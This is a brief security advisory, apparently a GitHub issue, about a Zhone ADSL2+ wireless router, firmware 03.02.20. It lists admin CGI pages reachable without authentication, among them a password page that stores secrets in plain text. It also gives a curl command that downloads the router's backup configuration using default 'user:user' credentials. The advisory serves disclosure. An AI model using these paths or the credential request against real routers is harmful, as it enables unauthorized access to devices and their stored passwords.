Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)
hkm opened this issue · comments
Exploit Title: Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)
Date: 01/09/2015
ZHONE Firmware: 03.02.20
Product Name: 6218-I2-xxx
Firmware Link: http://www.zhone.com/support/downloads/cpe/6218-I2/6218-I2_R030220_AnnexA.zip (Login Required)
Author: Mahmoud Khaled
Contact: mahmoud_khld@yahoo.com
Patch/ Fix: Vendor has not provided(and wont provide) any fix for this yet
Disclosure Timeline
01/09/2015 Contacted Vendor/Vulnerability Explained
01/09/2015 Vendor Replied Denying Responsibility of The Product
01/09/2015 Full Disclosure
Description
A. The following links can be accessed without any authentication:
http:///pvccfg.cgi
http:///dnscfg.cgi
http:///password.cgi (In addition to text storage of sensitive information)
B. Obtaining backup DSL router configurations by a user account authentication:
curl ""http:///backupsettings.conf"" -H ""Authorization: Basic dXNlcjp1c2Vy"" (""dXNlcjp1c2Vy"" = ""user:user"" in base64)